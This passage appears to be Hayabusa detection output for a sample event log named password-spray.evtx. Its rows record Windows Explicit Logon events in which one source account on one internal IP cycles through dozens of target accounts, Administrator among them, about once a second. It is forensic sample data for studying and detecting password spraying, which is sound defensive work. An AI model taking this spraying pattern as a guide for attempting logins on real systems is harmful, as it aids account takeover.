Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : 